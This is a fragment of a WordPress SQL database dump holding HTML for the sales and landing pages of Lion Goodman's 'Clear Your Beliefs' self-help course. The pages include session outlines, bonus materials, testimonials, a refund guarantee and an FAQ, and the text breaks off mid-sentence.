Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd">Purchase</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-12 12:21:41', '2014-12-12 17:21:41', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2018, 2, '2014-12-12 00:09:23', '2014-12-12 05:09:23', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\r\n&nbsp;\r\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong>\r\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\r\n\r\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\r\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\r\n<h1>\r\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\r\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\r\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\r\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\r\n&nbsp;&nbsp;			<h1>\r\nWhy Does This Happen?</h1>\r\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\r\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\r\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\r\n\r\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\r\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\r\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\r\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\r\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\r\n\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\r\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\r\n\r\n<strong><em>I’m not enough.</em></strong>\r\n<strong><em>I can’t do it.</em></strong>\r\n<strong><em>I’m not worthy.</em></strong>\r\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\r\n<strong><em>I’m all alone.</em></strong>\r\n\r\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\r\n<strong><em>There’s something wrong with me.</em></strong>\r\n<strong><em>I’m fundamentally flawed.</em></strong>\r\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\r\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\r\n\r\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\r\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\r\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left">The same thing is true in your subconscious mind:</p>\r\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\r\n<p style="text-align: left"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> It’s that simple.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n\r\nWhy 